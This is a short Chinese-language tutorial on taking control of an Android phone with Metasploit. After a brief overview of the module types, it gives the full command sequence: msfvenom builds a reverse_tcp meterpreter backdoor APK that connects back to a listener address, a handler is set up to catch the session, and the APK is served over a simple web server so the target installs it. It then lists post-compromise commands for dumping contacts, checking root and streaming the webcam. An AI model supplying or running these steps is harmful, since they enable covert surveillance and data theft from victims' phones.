msf手机控制0

Metasploit及其监听模块介绍

辅助模块（auxiliary）进行信息收集，执行扫描的功能。
渗透攻击模块（exploit）用于实际进行渗透攻击，得到一定的权限
攻击载荷模块（payload）把权限持久化，目标系统被成功渗透后执行的代码
后渗透攻击模块（post）进一步渗透测试:提权

handler 监听后门模块

use exploit/multi/handler
（使用handler监听模块）

 

 

（设置攻击载荷模块）
set payload android/meterpreter/reverse_tcp

制作恶意软件并获取shell权限
msfvenom是msfpayload和msfencode的结合体，可以生成木马程序，并在目标机上执行，在本地监听上线

生成android后门
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444 > shell.apk

使用msf中开启监听
* use exploit/multi/handler
* set payload android/meterpreter/reverse_tcp
* set lhost 192.168.1.10
* set lport 4444
* run

下载apk
在kali中apk后门所在目录开启web服务：python -m SimpleHTTPServer

在安卓浏览器里访问网址下载apk

安装apk并打开apk

 

 

msf中会建立会话

执行命令
sysinfo 查看系统信息
app_list 查看安装app文件
check_root 检测系统root
dump_contacts 下载通讯录信息
webcam_list 获取摄像头信息
webcam_stream 开启摄像头